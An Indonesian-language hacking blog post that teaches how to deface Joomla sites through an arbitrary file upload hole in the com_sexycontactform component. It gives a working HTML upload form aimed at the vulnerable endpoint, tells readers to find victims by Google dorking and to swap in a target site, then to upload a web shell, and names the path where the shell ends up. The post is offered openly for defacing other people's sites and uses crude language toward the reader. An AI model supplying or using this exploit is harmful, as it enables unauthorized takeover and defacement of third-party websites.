Deface dengan Exploit Joomla com_sexycontactform Arbitrary File Upload Vulnerability

Oke kali ini mau berbagi exploit yang ane dapet kemaren. Sebenernya masih banyak target perawan sih, tapi berhubung ane mau berhenti dari dunia persilatan ini, wkwkwk . Ane share aja deh tutornya. Semoga bermanfaat bagi yang masih doyan deface.

Oke, pertama, siapin dulu html exploiter nya.

<form method="POST" action="http://localhost/components/com_sexycontactform//fileupload/index.php"

enctype="multipart/form-data">

<input type="file" name="files[]" /><button>Upload</button>

</form>

Simpan dengan format .html

Lalu dorking di google.

Dork : ??

Use ur brain, bitch !!

Victim nya di :

http://localhost/components/com_sexycontactform//fileupload/index.php

kalo udah nemu target , edit html explot nya tadi. ganti http://localhost dengan situs target.

lalu buka file html tadi dengan browser.

ada form upload. Upload shell lewat situ.

Kalo ada semacam notice gak jelas kek jembut gitu tandanya shell sukses di upload.

Shell ada di http://localhost/components/com_sexycontactform//fileupload/files/shell.php

Sekian tutor kali ini, semoga bermanfaat .

Happy Hacking ^_^

By

Deface dengan Exploit Joomla com_sexycontactform Arbitrary File Upload Vulnerability

Written by Kcnewbie

0 comments

Thanks to

Pageviews

Popular Posts

About Me